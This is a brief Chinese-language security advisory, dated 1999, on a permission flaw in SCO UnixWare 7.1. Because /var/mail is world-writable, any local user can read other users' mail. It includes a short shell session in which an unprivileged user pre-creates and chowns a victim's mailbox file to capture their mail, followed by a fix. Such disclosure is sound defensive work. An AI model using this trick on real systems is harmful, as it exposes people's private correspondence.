SCO UnixWare '/var/mail' 权限漏洞发布时间:1999-12-03 更新时间:1999-12-03 严重程度:低 威胁程度:权限提升 错误类型:配置错误 利用方式:服务器模式 受影响系统 SCO详细描述 一部分的SCO UNIXWARE7.1随带的/var/mail/目录权限是 777,这表示任意用户如果没有MAIL文件的话也可以进入此目录读任意用户的MAIL。 测试代码 bash-2.02$ id uid=106(xnec) gid=1(other) bash-2.02$ pwd /var/mail bash-2.02$ touch btellier bash-2.02$ chown btellier btellier bash-2.02$ ls -la btellier -rw-r--r-- 1 btellier other 0 Dec 4 07:54 btellier Now wait for btellier to get some mail... 解决方案 设置正确的属性 相关信息 |
